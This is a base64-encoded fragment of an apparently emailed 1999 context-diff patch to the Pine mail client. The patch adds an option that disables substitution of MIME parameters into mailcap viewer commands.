    ID0gbWNfY21kX2JsZHIobWMtPmNvbW1hbmQsIHR5cGUsIHN1YnR5cGUsIHBh
    cmFtcywgdG1wX2ZpbGUpKSkNCiEgICAgICAgY29tbWFuZCA9IGNweXN0cigi
    Iik7DQogIA0KICAgICAgZHByaW50KDUsIChkZWJ1Z2ZpbGUsICJidWlsdCBj
    b21tYW5kOiAlc1xuIiwgY29tbWFuZCkpOw0KICANCioqKioqKioqKioqKioq
    Kg0KKioqIDg3MSw4NzYgKioqKg0KLS0tIDg3Myw4ODQgLS0tLQ0KICAJCWJy
    ZWFrOw0KICANCiAgCSAgICAgIGNhc2UgJ3snOgkJCS8qIGluc2VydCByZXF1
    ZXN0ZWQgTUlNRSBwYXJhbSAqLw0KKyAJCWlmKEZfT0ZGKEZfRE9fTUFJTENB
    UF9QQVJBTV9TVUJTVCwgcHNfZ2xvYmFsKSl7DQorIAkJICAgIGRwcmludCgy
    LA0KKyAJCQkgICAoZGVidWdmaWxlLCAibWNfY21kX2JsZHI6IHBhcmFtIHN1
    YnMgJXNcbiIsIGZyb20pKTsNCisgCQkgICByZXR1cm4oTlVMTCk7DQorIAkJ
    fQ0KKyANCiAgCQlzID0gc3RyaW5kZXgoZnJvbSwgJ30nKTsNCiAgCQlpZigh
    cyl7DQogIAkJICAgIHFfc3RhdHVzX21lc3NhZ2UxKFNNX09SREVSLCAwLCA0
    LA0KKioqKioqKioqKioqKioqDQoqKiogOTU2LDk2MiAqKioqDQogICAgICAg
    IHNwcmludGYodG8sIE1DX0FERF9UTVAsIHRtcF9maWxlKTsNCiAgDQogICAg
    ICByZXR1cm4oY3B5c3RyKHRtcF8yMGtfYnVmKSk7DQohIH0gDQogIA0KICAN
    CiAgLyoNCi0tLSA5NjQsOTcwIC0tLS0NCiAgICAgICAgc3ByaW50Zih0bywg
    TUNfQUREX1RNUCwgdG1wX2ZpbGUpOw0KICANCiAgICAgIHJldHVybihjcHlz
    dHIodG1wXzIwa19idWYpKTsNCiEgfQ0KICANCiAgDQogIC8qDQoqKiogLi9w
    aW5lL3BpbmUuaC5vcmlnCVRodSBKYW4gMjggMTY6NTI6MDAgMTk5OQ0KLS0t
    IC4vcGluZS9waW5lLmgJVHVlIEZlYiAgOSAxOToyMzoyMSAxOTk5DQoqKioq
    KioqKioqKioqKioNCioqKiA4ODYsODkxICoqKioNCi0tLSA4ODYsODkyIC0t
    LS0NCiAgCUZfU0hPV19URVhUUExBSU5fSU5ULA0KICAJRl9ST0xFX0NPTkZJ
    Uk1fREVGQVVMVCwNCiAgCUZfTk9fRkNDX0FUVEFDSCwNCisgCUZfRE9fTUFJ
    TENBUF9QQVJBTV9TVUJTVCwNCiAgI2lmZGVmCUVOQUJMRV9MREFQDQogIAlG
    X0FERF9MREFQX1RPX0FCT09LLA0KICAjZW5kaWYNCg==
    --4100290-15032-918699671=:-197051--